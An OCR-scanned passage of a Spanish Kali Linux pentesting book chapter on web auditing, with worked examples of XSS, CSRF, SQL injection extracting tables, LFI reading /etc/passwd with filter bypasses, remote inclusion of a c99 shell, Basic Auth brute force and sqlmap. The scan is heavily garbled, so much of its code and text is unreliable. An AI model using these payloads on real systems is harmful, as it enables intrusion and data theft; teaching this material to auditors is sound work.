del lado de los “hackers”. No obstante, en algunos casos es viable la utilización de técnicas 
га la evasión de filtros, en caso de que estos no'se encuentren lo suficientemente revisados, es 
osible aprovechar el descuido de los desarrolladores para llevar a cabo los ataques. 


. Explotación de vulnerabilidades web comunes 


05 medios de comunicación, tienden a malinterpretar en cierta medida las noticias referentes a 
idad informática, al proveer de información a los usuarios. Es importante tener fuentes 
‹ ivas para conseguir material didáctico fiable, en lo que a este campo se refiere. Un caso 
“desinformación”, ocurrió en 2010 cuando se anunció a la población española de un supuesto 


“Hackeo” sobre la página de la presidencia española de la UE. Nada más lejos de la realidad, 
trataba de un Cross Site Scripting reflejado, en el buscador de la página. Este fue difundido o 
diversos medios, como Facebook, Twitter o correos electrónicos, hasta que se desmintió días 
tarde, después de la revisión del servidor. 


Imagen 05,01: XSS en la página de la Presidencia Española de la EU. 


La imagen de Mr. Bean, caricaturizando los rasgos de José Luis Rodríguez Zapatero, no fue 
auténtico defacement con la consiguiente intrusión al servidor, sino la modificación del ci 
HTML de la página solicitada, desde una URL modificada. A continuación se muestran los tipos. 


Cross Site Scripting que se pueden encontrar. К 


Cross Site Scripting 
La vulnerabilidad de Cross Site Scripting, conocida comúnmente de forma acortada como 
supone una serie de riesgos en todas sus variantes, las cuales pueden dañar principalmente al 
y a la reputación del dominio y/o empresa afectada. 
Entre otras cosas, es posible: 

- Realizar ataques de navegación dirigida, 

- Ataques de phising. 

- Distribución de malware. 

- Robo de credenciales. 

- Ejecución de script "JavaScript". 

- Click Hijacking. 

- Defacement sin o con alteración de la página real. 


o V. Auditoría de aplicaciones Web 


де vulnerabilidad, puede conllevar a muchos y nuevos ataques web, debido a que un 
| de ejecución JavaScript sobre el navegador de una víctima, abre vectores de ataques como 
| The Browser “MITB”, pudiendo tomar un control remoto del navegador, y pudiendo realizar 
es de exploits con el objeto de realizar una escala de privilegios en el sistema. En otros 
na la ingeniería social y la común falta de conocimientos del usuario afectado, al caer en 
gina fraudulenta. 


ente se pueden diferenciar dos tipos de Cross Site Scripting:, Cross Site Scriptring Reflejado, 
is Site Scripting Persistente. 


Site Scripting Reflejado 

ión del fallo, se basa en la manipulación de un parámetro vulnerable, con el objetivo de 
enlace modificado que embeba código HTML o de script. Dentro de la distribu: Kali 
posible encontrar multitud de herramientas para realizar de forma cómoda, la búsqueda 
este tipo de vulnerabilidades, mediante la utilización de proxys inversos. Entre las más 
se encuentra la herramienta Burp Suite y OWASP ZAP. 


inverso, necesita de una previa configuración en el navegador, desde la cual se conectará 

local, para realizar capturas del tráfico web mediante puntos de interrupción, El navegador 
fecto en Kali Linux, es IceWeasel, un proyecto derivado de Mozilla Firefox, el cual dista poco 
a configuraciones de este tipo. 


Е: Lenjo] 


Imagen 05.02: Configuración de Proxy en /ceWeasel. 


Pentesting соп Ке 


Una vez realizado el paso de configuración en 1ceWeasel, el navegador estará preparado para ei 
las peticiones web, a través del “Proxy inverso”. En este caso, se realizará la prueba con OW 
ZAP, interceptando una petición HTTP, en la cual se envía el parámetro "user-", que 
usuario “Admin” y lo muestra en pantalla. 


¡Bienvenido usuario Admin! 


//алолүпдыз/ргыяЬаа/ тзз/ кзз .php user ШЙ HTTP/ 12.1 
jost: 
luser- Agent: Mozilla/S.0 (Xll; Linux 3686; rv;18.0) Cecko/20100101 Pirefon/ 


Imagen 05.03: OWASP ZAP interceptando 


Se podría trabajar de forma sencilla con todo tipo de peticiones, en caso de encontrarse con 
petición POST, esta aplicación se encargaría de interceptarla y permitiría modificar al v 
sus parámetros. Además esta, cuenta con una pestaña de respuesta la cual, aun no interpr 
JavaScript, sería posible leer el código de la página devuelta, con lo que sería viable identifi 
posible Cross Site Scripting. A continuación, se muestra una imagen con la respuesta vista. 
OWASP ZAP, modificando la кайы del anterior valor “Admin” рог el de un Tag Script. 


Date: Tue, 26 Mar 2013 14:53:42 CMT 
Server: Apache/2.2.11 (Win32) mod ss1/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 


[amata http: equiv="Content-Type" 
letitle»Sitio de Germán Sánchez</title» 
[<hl»i Bienvenido usuario «sc Лагі. 


Imagen 05.04: OWASP ZAP y Cross Site Scripting Reflejado. 


Visto desde el navegador de IceWeasel, el JavaScript sería interpretado de la siguien 
ejecutándose la siguiente alerta en pantalla. 
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Imagen 05.05: Cross Site Scripting Reflejado en IceWeasel. 


5 Site Scripting Persistente 


de Cross Site Scripting, queda normalmente registrado en una base de datos, al realizar 
malintencionada tras unos parámetros mal filtrados. La recogida del contenido de la 
posteriormente es rescatada de los datos almacenados y estos vuelven a ser mostrados. 
son interpretados y ejecutados en el navegador de la víctima. 


las pruebas, se utilizará la herramienta Burp Suite en su versión gratuita, disponible en 
Con esta herramienta, se puede interactuar con las peticiones interceptadas, permitiendo 
(а diferentes herramientas como un Spider, un Intruder о el conocido Repeater entre otras. 
Repeater, permite realizar repeticiones sobre peticiones capturadas, En el siguiente 
e muestra como se almacena el nombre de una ciudad en una base de datos, mediante una 
GET. 


Date: rue, 26 Mar 2013 16:14:46 GMT 
ver; Apache[2.2.11 (Win32) mod ssi 2.11 OpenSSUo.9.8 PH9/5.2.9 

-Powered-By: РНР 29 

ote Length: 32 

ieep-Abve: timeout S. max= 100 

Connection: Kaep-Alve. 

отете Туре: text/html 
ciudad Madrid ha sido grabada 


Imagen 05.06: Incluyendo Madrid en la BBDD. 


Además, este dominio cuenta con un PHP para extraer los nombres de las ciudades у 
Este tipo de ejemplos, es posible verlos en los registros a páginas, en los que se introducen 
perfil que más tarde son rescatados y expuestos a los usuarios. 


Imagen 05.07: Extracción de la ciudad de la baso de datos, 


Si el PHP encargado del almacenamiento del nombre de la ciudad, no filtra 
parámetro “ciudad=", podría darse el caso de que un atacante modificase la ciudad 
HTML y este se insertase íntegro en la base de datos. El Cross Site Scripting hasta este m 
existiría, debido a que el segundo factor es el PHP de extracción, si ambos carecen de 
daría el Cross Site Scripting Persistente. 


anonymous 
Agent: могйагэ о (X11: Linu 66: rv:18.0) Gecka/20100101 Frefor/18.0 iceweasel/18 0.1 
теми apolicat appicationpemia-0 9^ q-0.8 


Imagen 05.08: Extracción de imagen de la base de datos. 


V. Auditoría de aplicaciones Web 


observa en el código fuente de respuesta, ha sido posible embeber una imagen, que, 
da desde el propio Burp Suite o visualizada desde un navegador, se vería como un 


+ inOnymOus/pruebas/xss. p/vss. echo php?ide 30 + > @ | 


Cludad reg 
Imagen 05.09: Imagen renderizada. 


е encontrar este tipo de vulnerabilidades, distribuidas en casi cualquier parte que componga 
п HTTP. Desde los diferentes métodos, tipos de cabeceras que impriman texto, ataques 
inclusive explotando XSS mediante ataques Remote File Include. 


ión de cara al usuario, se rige principalmente por las versiones y tipos de navegadores 


21 Explorer incluyó protecciones contra ataques XSS a partir de la versión 8. Google Chrome 
їп propuso su propio filtro para evitarlos, a partir de la versión 11.0 inclusive, aunque en estos 
protecciones, se basan en evitar ataques reflejados. Mozilla Firefox sin embargo, no utiliza 
cto ninguna protección, de la misma manera que /ceWeasel en Kali Linux, no obstante es 
descargar el complemento NoScript en ambos casos, el cual provee al navegador de una 
*cción más potente ante-la ejecución de cualquier tipo de script. 


la búsqueda de medidas evasivas ante este tipo de filtros. Existen multitud de documentos 
net, conocidos como “cheat sheet” los cuales explican cómo conseguir la ejecución de 
pt con estas protecciones en navegadores seguros. 


jemplo sencillo podría ser el siguiente: 


io malintencionado manipula el parámetro vulnerable de una página, (el cual se embebe 
de un JavaScript por descuido del desarrollador), será posible explotar el fallo que se pueda 
, sin que los filtros de los que disponga el navegador se percaten. 


iser-Agent: Mozilla/5.0 (X11; Linux i686; rv.18.0) Gecko/20100101 Firefox/18.0 iceweasel/18.0.1 
сері: text/^tml.application/xhtml--xml,application/xmi;q- 0.9,*/*:q- 0.8 
'cept-Language: en-US,en;q- 0.5 


[<script type="text/javascript">var gaq = gaq || (1; 
gaq.push([' setAccount', 'UA-21258067-1']); 


jame', 'twoo.com']); 
caos "[publicprofile?:, 

¡CustomvVar, 1, *is logged in. 
jaq. medi setCustomVar, 2, "avatar", "m 
aq. push([. setCustomVar, 4, "bought credits", "МО", 11); 
_9aq.push(['_setCustomVar', 5, "gender", *MALE*, 1]; 


Imagen 05.10: Cross Site Scripting en navegadores seguros. 


rt(document. cookie), ]); 


Por todo lo indicado es altamente recomendable para fortificar un servidor, llevar a cabo 
forma periódica, de la parte web, del código fuente, además de revisar actualizaciones del & 
instalado y del sistema operativo. Un punto extra, sería la implementación de aplicaciones V 
actüen como firewall a nivel de servicio. 


Cross Site Request Forgery 


Este ataque, fuerza a la víctima a realizar acciones no deseadas en una aplicación, la cual n о 
un buen empleo de las tokens de sesión para identificar al usuario que la ejecuta. Este 
vulnerabilidades afectan a todo tipo de aplicaciones, entre los objetivos más comunes se е! 
aquellos destinados a sistemas de recolección de votos o de la publicación de contenidos 


de spam. 


Para realizar un ejemplo práctico, se expone a continuación una página, desde la que una pe 
POST oculta tras el señuelo de una imagen, la realización de votos online sin el consentimi 
usuario afectado, sobre otra web. 


Otra de las herramientas interesantes que propone Kali Linux, es Vega en su versión 1.0. 
por la empresa Subgraph. Esta se compone de dos funcionalidades clave, por un lado un 
de vulnerabilidades y por otro la función de Proxy que de igual manera que en las а 
herramientas, servirá para incluir puntos de interrupción en las peticiones. En este caso se: 
control del llamado Request Editor, para realizar el envío manual de peticiones. 


La siguiente imagen muestra el contenido de respuesta HTML, como resultado de la рейсі 
página atacante la cual, aloja una petición POST para un sistema de votaciones. 
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(GET /pruebas/csrt/ HTTP/1 1 


| Host: anonymous 
User-Agent: Mozilla/S.0 (X11: Linux 1686; r180) Gecka/20100101 Frefox/18,0 Iceweasel/18.0.1 


Accept: text/htmi application/ xhtml + xmi application/xmi:q=0.9. */*:q=0.8 
Accept: Language: en-US,enq=0 5 
Accept-Encoding. gzip, deflate 


“<center»<h1>Descubre el enlace que se esconde detrás de тй» 

(img ste="http./192.168.0.150/pruebas/csrf/carita f" onmouseover=" send)" ></cemerz 
form action= "http://www MI comivoto php" method» "post" > 

<input type="hidden” name-"id. votacior" value="1153157> 

«<input type="hidden" name="ingles” value=""> 

input type="hidden" names”opcion” value="458153"]| 

«лот» 

E 


Imagen 05.11: Request Editor en Vega 1.0. 


e observa en el código, el evento onmouseover se encarga de llamar a la función send, 


el contenido de form. Este JavaScript redirecciona al usuario víctima, hacia la página en 
е el CSRF, al pasar el ratón por encima de la imagen carita. gif se ejecuta el evento y se 
ión POST. 


е imagen muestra la votación realizada con éxito. 


BT VS KALI 
Efe en tutus? 


Imagen 05.12: CSRF en sistema de votaciones. 


SQL Injection - 


Las vulnerabilidades de SOL Injection, afectan a todas las aplicaciones web que rescatan inform 
de una base de datos mediante parámetros mal filtrados. Estas técnicas de inyección, afectan a f 
tipo de bases de datos, como Microsoft SOL Server, MySQL, Microsoft Access, Oracle, Postgi 


о Sybase entre las más comunes. 


Las bases de datos MySQL al ser las más utilizadas, han ido recolectando diferentes técnici 
ataque como las conocidas Blind, inyecciones basadas en aritmética, en tiempo de respuesta о 


errores. 


Para llevar a cabo este tipo de inyecciones, es conocida la inclusión de una comilla simple en 
parámetros a recoger, con el objetivo de forzar un error de sintaxis SOL, y provocar así q и 
página devuelva algún tipo de error en pantalla. Como no todos los servidores tienen la opciói 
display_errors habilitada, otras técnicas como comparaciones matemáticas “and 1=1” y el esper 
cambio del HTML de la página devuelta con “and 1=2”, posibilitan la oportunidad de detecta 


SOL Injection sin apenas dificultad. 


Para exponer un ejemplo práctico basado en una comparación lógica, la herramienta Con 
de Burp Suite, puede ser utilizada para buscar palabras modificadas, agregadas o eliminade 
varias peticiones. Con lo que la diferencia entre “and 1=1” y “and 1=2”, muestra un posible са 


a la vista. 


Length: 38.397 


Transitional//EN* | 
"ер {нгш w3.org/TR/XhtmI/OTO/xhtrmlltransitional. dtd* 


> 
<html xminse-"htto://www w3.org/1995/xhtml*»- 
<head> 

<meta http-equiv="Content-Type" contente^text/html: 
charsetaiso-8859-1' 


Tras la búsqueda de columnas existentes mediante “ORDER BY”, tan solo se encontró una. 
campo imprimible ubicado en el título de la página, ha sido utilizado para identificar con facilié 
desde el buscador de la herramienta Repeater en Burp Suite, la palabra “SOL?” inyectada en el V 
a recoger. Desde este campo será posible, extraer información dependiendo del nivel de pri 
con el que se ejecute la consulta. Es necesario revisar el código HTML de respuesta, del 
que el título no es visible en el cuerpo HTML del navegador y la utilización de Burp Suite 


enormemente esta tarea. 


Existen diferentes funciones nativas, las cuales pueden resultar útiles para llevar a cabo la exploti 


de la vulnerabilidad. 


Word compare of #3 and #4 (14 differences) 


Length 8.205 


Transitional//EN" 
"htto:[/www.w3.org/TR/xhtmi/DTD/xhtml1 transitional dtd* 


> 
<html xmins e^ http://www. иЗ. org/1999/xhtmi»- 
<head> 

«meta http-equiv="Content-Type" contente"text/html: 
charset=iso-8859-1* /> 

<title>Fotos «Ле» 


Imagen 05.13: Comparer en Burp Suite. 


<meta http-eauiv- Content-Type" content "text/html: charset=1s0-8859-1*/> 
<tile>Fotos SQUI<pitle> 


e | 


Length: 6.115 (154 milis) 


Imagen 05.14: Imprimiendo SQLi en el HTML. 


si ible realizar la extracción de la versión de MySQL con la función @@version о version(). 
rá particularmente muy importante, debido a que el paso de versión 4 a 5 en MySQL, supuso 
а la hora de realizar los ataques dentro del ámbito de auditoría Web. Esto es debido a que 


do de si la versión pertenece a la 4.x o anteriores, los ataques a las tablas y columnas de 

de datos, se realizarán por fuerza bruta. En cambio si la versión es a partir de la 5.x, existirá 
llamada /nformation Schema, la cual almacenará información de todas las bases de datos, 

e se podrá extraer información siempre y cuando se posea el privilegio necesario. De la 

a, la extracción del usuario de la base de datos se realizaría con la función current, user 


imagen muestra una supuesta Botnet vulnerable a SQL Injection, en la que mediante 
UNION SELECT, se encontró un campo imprimible de entre los cuatro existentes, 
para extraer el usuario de MySQL. 


Length 436 (1.019 milia] 


Imagen 05.15: Usuario root de la base de datos. 


Si el auditor utilizase la misma comprobación pero en este caso para extraer la уе 
dispondría de la suficiente información como para evitar el fuzzing y realizar consultas a 
de Information Schema. La siguiente imagen demuestra, como es posible extraer el ni 
tablas de la base de datos utilizada por el desarrollador, para realizar la consulta. 
resultados de la query con group concat y seleccionando el nombre de la base de datos. 
extraer la información. 


азай phpTid=1+union «select 1.2 [selectegroup concatitable name)from-nformation 
[chara tables +uhare+table_scherna=database())4-- HTTP/I.1 


3 
<form actions sq) php" methode "ger"» Dominios en Botnet:<form> 
еті 


Imagen 05.16: Extracción de tablas con SQL Injection. 


Se ha acudido a la función nativa para realizar una evasión en caso de que el PHP, tuviese ha 
las magic_quotes, pues el nombre de la base de datos se incluye entre comillas. El sigui 
para un auditor, sería la extracción de columnas de entre las tablas más sensibles: la de 
Para realizar la consulta con el fin de extraer las columnas de la tabla users, sería importante 


nativas, SOL implementa codificaciones conocidas. Pasar nombres a su equivalente C/ 
hexadecimal, evitará las comillas simples en la query. Para realizar codificaciones, Burp Suit 
provee al auditor de la herramienta Decoder, esta incorpora las codificaciones más conoci 
siguiente imagen muestra la utilización de dicha herramienta, con el nombre de la tabla users 


[nmmnn 


Imagen 05.17: Decoder de Burp Suite. 


anonymous 
Mozilla 0 (X11; Unux 


Imagen 05.18: Extracción de columnas con SQL Injection. 


| columnas separarían al auditor, de los usuarios y sus respectivos hashes para hacerse 


9 de la Botnet. 


listados del contenido de las columnas, es posible agregar caracteres de salto de 
„ con objeto de acomodar los resultados. 


Imágen 05.19: Extracción de valores con SOL Injection. 


pequeña alusión al cracking de hashes, nada tan usual como la utilización de 
Online como esta que Kali Linux esconde tras el menú de Ataques a Contraseñas > 
mexión > Findmyhash. 


provee al auditor de la posibilidad de aumentar las Rainbow Tables de forma online, 
s con enormes listas de hashes. Incluyendo los parámetros con el tipo de cifrado 
herramienta busca en diferentes páginas mostrando en algunas ocasiones el string 


rootgkali:=+ /usr/bin/findmyhash MOS -h el8adc3949ba59abbo56e957f20 f883e 
racking hash: el8adc3949ba59abbg560057 f20 8830 


lyzing with nicenamecrew [httpt//crackfoo.nicenamecrew.com)... 
hash not found in nicenamecrew 


|^ 


://100m & 


Analyzing with joomlaaa (htt 
. hash not found in joomla 


com]... 


Analyzing with md5-lookup (http://mdS-lookup.com)... 
ome ЫЙ ПШ 
[The original string is: 123 


Тһе following hashes were cracked: 


e1Gadc3949baSgabbe560057f20f883e -> 123456 


гоотёка\1:-# 
Imagen 05.20: Findmyhash encuentra la string 123456. 


Local File Include/Path Transversal 


Esta vulnerabilidad permite la inclusión de ficheros locales, desde una aplicación qi 
archivos mediante un parámetro sin filtrar. Además en algunos casos, es posible la 
código remoto incluyéndolo en las cabeceras de una petición HTTP, que más tarde será 
al incluir los ficheros de log en la página vulnerable a LFI. 


Es común el uso de funciones que permitan la inclusión de archivos, con lo que si la reco] 
valor en una petición recae directamente sobre este tipo de función, es posible incluir 
fichero. En PHP, las funciones que dan pie a llevar a cabo este tipo de ataques son las sigui 


- include “fichero”; 

- require “fichero”; 

- include once "fichero"; 

- require once "fichero"; 
Es imposible diferenciar de forma visual en algunos casos, si lo que recoge un pará 
fichero о un valor. Esto se debe а que muchos desarrolladores intentan ofuscar las exi 


los archivos incluyéndolas en el propio código de la página. El truco para reconocer esto, € 
un byte nulo al final del valor del parámetro, siendo este %00. 


Para demostrar esto último, en el siguiente ejemplo práctico se intentará llevar a cabo la 
del fichero passwd de UNIX, en el que la detección de la extensión es trivial. 


= 


B» Undefined LOC (../../../../etc/passwd.php).</8> 


Imagen 05.21: Detección de extensión PHP. 


о el byte nulo en la petición, se rompe la extensión que junto con el descontrol de 
„ hacen que sea posible encontrarse con lo siguiente. 


Imagen 05.22: Agregando el byte nulo para romper extensiones. 


diferencia entre el ataque de Local File Include o LFI comúnmente de forma acortada 
versal, radica en la forma de extracción de los ficheros. Una extracción en la que el 
'be en la página o como su propio nombre indica, se incluye, se denomina Local File 
п cambio si la extracción del fichero es descargada sin pasar por el código de respuesta de 
se denomina Path Transversal. Esta diferencia, en algunos casos afecta a la explotación de 
dad, debido a que se incluyese un fichero como por ejemplo un PHP sobre la función 
e será interpretado, y daría lugar a la impósibilidad de leer el código fuente. 


'tútil para la extracción del código fuente en un servidor con PHP, con la vulnerabilidad 
| siguiente caso: 


la versión 5.0.0 de PHP, se incorporaron filtros de conversión para realizar codificaciones 

iones en Base64. Este filtro aplicable con las funciones convert.base64-encode y 

decode, puede ser utilizado para codificar en Base64 el código PHP en una petición, 

'embebido por el include en la página vulnerable. De esta manera el código fuente no sería 

¡y sería fácilmente reversible para extraer el contenido de los ficheros. A continuación se 
de empleo del filtro. 


Imagen 05.23: Texto codificado en Вазеб4. 


Como se puede apreciar en la imagen, dentro de la pestaña HTML se muestra en la p 


fragmento del código HTML de la página, incluyendo una ristra de texto codificado en 
auditor tendrá la opción de copiar el texto codificado y llevarlo hasta la herramienta 
Burp Suite, para su visualización de forma entendible. 


stvelsdivisioni: 


ar рр. 


evitar la vulnerabilidad. 


<?php 

Spage = "./".$ GET["page"]; 

if (substr(Spage,-6)--"passwd")( //si termina en passwd 
die("Hacking attempt"); //muestra el error y se termina 


]include ($page) ; 
E 


Auditoria de aplicaciones Web 


ligo PHP, es un filtro encargado de revisar si los seis últimos caracteres introducidos en el 
mediante el método GET, terminan en la palabra passwd. Si es cierta la condición, 
muestra el mensaje Hacking attempt y finaliza. 


Thu. 04 Apr 2013 14:43:35 GMT 
|Server: Apache[ 2.11 (Win32) mod ssli2.2 1: OpenSSL0 9.8 PHP/S 2.9 


Content-Type: text/html 


[Hacking attempt 


Imagen 05.25: Hacking artempt. 


izar la evasión? Es muy sencillo. Utilizando los caracteres */.” para asignar la carpeta 


e! Thu, 04 Apr 2013 14:50:46 GMT 
ғ: Apache/2,2.11 (Win32) mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/S 2.9 


Imagen 05.26: Extracción del texto: “Mi fichero passwd!”. 


evasiones posibles, sería tan simple corho introducir el byte nulo %00, debido a que 
palabra passwd, no se encuentra ningün otro carácter. 


ligo que se muestra a continuación, se demuestra como existen casos en los que se realizan 
соп diccionarios de rutas, donde se alojan archivos sensibles, para detectar posibles 


27" .$ GET["page"]; 

($page, “/etc/passud” )!2-FALSE)| //si encuentra /etc/passwd 
ng attempt"); //muestra el error y se termina 

расе); 


Una de las opciones más simples para llevar a cabo la evasión del filtro, sería romperla 
subir un directorio inexistente y bajándolo de nuevo de la siguiente manera, 
El siguiente ejemplo muestra la explotación de la mencionada vulnerabilidad. 


Date: Thu, 04 Apr 2013 15:01:12 GMT 
jerver: Apache[2.2.11 (Win32) mod ssl/2.2.11 OpenSSLJ0.9.8i PHP/5.2.9 


ji fichero passwd! :0 


Imagen 05.27; Bypass con subida de directorio inexistente. 


También sería viable para realizar la evasión, incluir los caracteres del directorio actual 
las rutas comprobadas de la siguiente manera, ../../etc/./passwd o haciéndolo mediante b 
etc////passwd. 


Remote File Include 


Esta técnica permite la inclusión de ficheros desde páginas externas. Se deben с 
requisitos para la explotación de la vulnerabilidad, entre otras cosas son importantes las 
de PHP y su mala configuración en el caso de permitir inclusiones de ficheros externos. 


De la misma manera que LFI, esta vulnerabilidad en PHP es explotable desde funcior 
include, include_once, require y require_once. 
<?php 

include ($_GET[ ‘url’ ]); 

include($ GET[*url2'] , ".php"); 

т> 


El primer parámetro, trataría de incluir una página externa sin ningún tipo de filtrado 
cuales son o no las idóneas. En este caso la explotación de la vulnerabilidad sería trivial, d 
que si se incluyese una shel! PHP, alojada en un servidor externo con cualquier tipo de 
interpretaría el código y sería vulnerada. 


El segundo parámetro del código ur/2, incluye la extensión “.php” al final de la url, con lo 
este caso a diferencia del byte nulo del anterior ataque LFI, se incluirá el carácter “#” 
en urlencode “%23”, para evitar que se entienda como un salto HTML. También es po 
utilización del carácter “?”, para provocar la exclusión de lo que contiene a la derecha del m 
La siguiente captura muestra la explotación de esta vulnerabilidad. | 


[о V Auditoria de aplicaciones Web 


[ил [нө [= 


pJ/c99 gen tr/c99 Те? НТТР/1-1 


O Iceweasel/18.0.1 


Imagen 05.28: Utilización del caracter “#” codificado. 


caciones de seguridad web en Kali 


Че Kali Linux, se encuentran multitud de herramientas que le servirán al auditor, para facilitar 
o de los ataques manuales vistos con anterioridad. 


mientas Proxy que Kali provee, incorporan no solo funciones de intercepción de peticiones 
e ha visto en este capítulo, sino también métodos de escáneres pasivo y activo para facilitar 
бп de vulnerabilidades, además de herramientas Spider y la posibilidad de trabajar 
mente con las herramientas del apartado de explotación. 


ones Proxy 

del apartado de Aplicaciones Proxy, se encuentran las herramientas Burp Suite, Paros, 
Vega, WebScarab y Zaproxy. Todas estas herramientas incluyen funcionalidades 
y son las más llamativas para la mayoría de los usuarios de Internet, siendo el resto 
das, aunque no por ello dejan de ser útiles. 


fe con licencia comercial, incluye uno de los escáneres de vulnerabilidades más potentes 
fecha, claro que la alternativa gratuita preferida por muchos Zaproxy, no deja indiferentes 
ores. 


de escaneo de Zaproxy, se dividen en secciones dependiendo del tipo de categoría de 

& Por defecto, trae habilitadas conocidas técnicas de inyección mencionadas en este capítulo. 

plas cosas, intenta la detección de vulnerabilidades Server Side Include (SSI), la cual permite 

de comandos remotos sobre el servidor e inyecciones CRLF, que permiten incluir 

[eS de salto de línea y retorno de carro en un parámetro sin filtrado específico, con el objetivo 
huevas líneas а la cabecera de una petición HTTP. 


Imagen 05.29: Política de inyecciones. 


Otra de las opciones a destacar dentro de las políticas de configuración de Zaproxy, se 
escaneos pasivos. 


Este tipo de búsqueda de vulnerabilidades web, se basa principalmente en el parseo de 
y códigos de respuesta, que el propio Proxy se ha encargado de interceptar y almace 

su historial de navegación. Vulnerabilidades basadas en la ausencia de flags seguros de 
cabeceras del tipo X-Frame-Options para evasión de ClickJacking, son detectadas con fi 
solo pasando las peticiones por el Proxy. 


v Plugin por categoría 
Inyección 
Miscelánea 
Navegador del cliente 


Recopilación de información 
Seguridad del servidor 


Imagen 05.30: Escanco pasivo. 


Al lanzar los escáneres, es posible realizar la búsqueda de vulnerabilidades encontradas 
pestaña de alerta de Zaproxy. ў 


А continuación se muestra un escaneo activo hacia un objetivo vulnerable, еп el cual se: 
explotar varios tipos de ataques. 


Imagen 05.31: Escáner activo. 


cativos para fuzzing 
о de este punto, Kali Linux ofrece un número amplio de herramientas, tales como Burp 
Ly su Intruder, Powerfuzzer, WebScarab, Webslayer, Websploit, Wfuzz, Xsser y Zaproxy. En 
los casos, se encuentran aplicaciones repetidas de otros apartados, debido a la cantidad de 
lalidades que estas ofrecen. 


jenta Wfuzz es una de las herramientas de fuzzing destinadas a directorios, archivos y 
hetros más potentes y conocidas que brinda Kali Linux. Su utilización es trivial e intuitiva 
de proveer de cantidad de listados de rutas con directorios y ficheros sensibles. 


? Suite junto con su herramienta /ntruder, es una solución gráficamente intuitiva y versátil, 
Jue esta consta de multitud de opciones que permiten el procesamiento de los diccionarios 
Sive con esta versión gratuita. Para realizar un ejemplo práctico de ataque con procesamiento de 
trios, se utilizará una prueba de concepto con un Basic Authentication, en el que se deberán 
un punto de fuzzing dentro de la cabecera de una petición HTTP, un diccionario, un prefijo 
codificación. 


El auditor se encuentra con el siguiente acceso, el cual deberá de realizar el ataque intei 
petición que transporta un usuario y contraseña ficticios. 


Imagen 05.32: Authorization Required. 


Al llegar la petición a la pestaña /ntercept de Burp Suite, es reenviada al Intruder para. 
esta, Payload Positions, define el lugar de ataque donde realizar el ataque por diccion 
caso la cabecera de Authorization: Basic deberá de ser seleccionada, pues se transporta € 
junto a las credenciales introducidas con anterioridad, codificada en Base64. 


@ Payload Positions 


Configure the positions where payloads wil be inserted into the base request The attack type determines the way in which, 
are assigned to payload positions - see help for ful details 


(GET pruebas/admin HTTP/1.1 

Host: anonymous 

User-Agent: Mozilla/S,0 (X11; Linux i688; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 
nixhtml--xml;applicationpxmi;g 0.9,*/*;q-0.8 


de realizaran las peticiones dentro de Payload Options, además del procesamiento en este 
especial debido a la codificación. 


La parte baja del formulario, expone multitud de procesamientos como la necesidad de il 
este ejemplo, el prefijo que transportará el nombre de usuario admin junto con la 
Base64-encode para afectar a todo el payload. 
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Payload Options [Simple list] 
This payload type lets you configure а simple list of strings that are used өз payiosda 


Imagen 05.34: Procesamiento del Payload. 


manera, estarán configuradas las opciones necesarias para que el auditor se dirija a Intruder 
Atack. 


Moved Permanently 


The document has moved here. 


Imagen 05.35: Redirección 301 a contenidos. 


ltados de Burp Suite, facilitan (mediante la detección del código de respuesta que el servidor 
cambio de la peti ), detectar cuales han sido las credenciales posiblemente válidas. La 
ión 301, indica en este caso que la respuesta no ha sido el código de Authorization Required, 
0 que es posible acceder al directorio con el usuario admin y la contraseña definida en la 
número cuatro del payload. 


Pentesting con Ki 


Escáneres de vulnerabilidades web 
Dentro de una auditoría de seguridad es necesario en algunos casos, cierta sutileza en el des 
de ataque, con lo que medidas automatizadas pueden realizar un número de peticiones o nive 
alerta frente а un IDS, que deriven en la inestabilidad de conexiones usuales. Es por este motis 
por el cual normalmente se realizan los ataques con herramientas en los horarios nocturnos, 
el objetivo de no incomodar la navegación normal de los usuarios, en los horarios en los с 
necesita de un alto rendimiento de сага a los servidores. No obstante, es posible la utilización 
aplicaciones con configuraciones que en algunos casos, puedan llegar a limitar la agresividad d 
mismas. 


Kali Linux incorpora un gran número de utilidades automatizadas, para la detección « 
vulnerabilidades Web. 


En este amplio listado se incluye algunas tan conocidas como w3af, Wapiti, sqlmap o xsser е 
otras. 


La herramienta sg/map, está diseñada para realizar test de penetración en bases de datos. 
encuentra de forma gratuita al igual que su código fuente, y automatiza el proceso de detecciói 
explotación de las vulnerabilidades SQL Injection vistas en puntos anteriores. La aplicación sq 
está desarrollada en Python, con lo que es multiplataforma. 


A continuación se muestran los modificadores más utilizados, para indicar a dicha aplicació 
diferentes métodos de extracción: 


- -u URL: Se define la página objetivo. 

- -р: Se incluye el parámetro vulnerable. 

- --dbs: Muestra el nombre de todas las bases de datos. 

- -Р: Selecciona el nombre de la base de datos donde se reálizarán las consultas. 
- --tables: Muestra el nombre de las tablas de la base de datos seleccionada. 

-  -T: Selecciona el nombre de la tabla donde se realizarán las consultas. 

- --columns: Muestra el nombre de las columnas de la tabla seleccionada. 

-  --dump: Extrae los datos de la tabla seleccionada a un fichero con extensión csv. 


--dbms: Permite seleccionar el motor de base de datos que utiliza la consulta: 
MySQL, ORACLE... 


En la siguiente imagen se puede observar la explotación de una página vulnerable a SQL Injectia 
la cual es explotada con éxito desde sg/map mostrando la consulta a llevar a cabo en consola. 


Como se puede apreciar en la imagen, de forma automática sg/map también extrae inform 
interesante para realizar un buen Fingerprinting, mostrando datos relativos al sistema op 
tecnologías y versiones de la base de datos. 
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sqimap/1.9-dev - automatic SQL injection and database takeover tool 
http: //sqlmap.org 


!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual 
consent is illegal. It is the end user's responsibility to obey all applicable 
ocal, state and federal Laws. Developers assuma no liability end are not resp 
ible for any misuse or damage caused by this program Э 


*] starting at 19:09:43 Uh 
3$ 


19:09:43] [INFO] testing connection to the target ш ч 
19:09:43] [INFO] heuristics detected web page charset 'ascil 
д\тар identified the following Injection points with a total of 6 HITP(s) req 


Type: UNION query 
MySQL UNION query (NULL) - 4 columns 


Payload: 14-108 UNION ALL ML, х71685ә4әас®@ 
p74516154,0x3a6b61613a) ¿NULL 
9:09: 1 


testing муз 
] confirming, MySQL. 
the back-end OOMS“ 15 MySQL 
rver operating system: Mindows 
lication technology: Apache 2.2.11, РНР 5.2.9 


19:99:43] [INFO] fetched data logged to text files under './output/4nünyn&us 


Imagen 05.36: SQL Injection con sqlmap. 


